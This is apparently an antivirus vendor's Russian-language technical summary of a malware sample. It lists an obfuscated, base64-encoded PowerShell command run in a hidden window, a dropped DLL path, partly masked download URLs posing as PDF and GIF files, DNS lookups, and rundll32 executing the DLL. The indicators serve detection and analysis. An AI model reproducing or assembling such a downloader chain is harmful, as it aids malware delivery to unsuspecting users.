Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAHMAcQA5AHUANQBnAD0AKAAnAFoANAAnACsAJwA2ADcAJwArACgAJwBmACcAKwAnAGMAawAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgBWADoAdQBzAGUAcgBQAHIATw...
- %HOMEPATH%\z0vmc1j\wk0j3qf\subqgji.dll
- http://cl####asallum.com/g3hrrmjj1.pdf
- http://de####risrapido.com/hue73vl.gif
- DNS ASK cl####asallum.com
- DNS ASK de####risrapido.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAHMAcQA5AHUANQBnAD0AKAAnAFoANAAnACsAJwA2ADcAJwArACgAJwBmACcAKwAnAGMAawAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgBWADoAdQBzAGUAcgBQAHIATw...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Z0vmc1j\Wk0j3qf\Subqgji.dll 0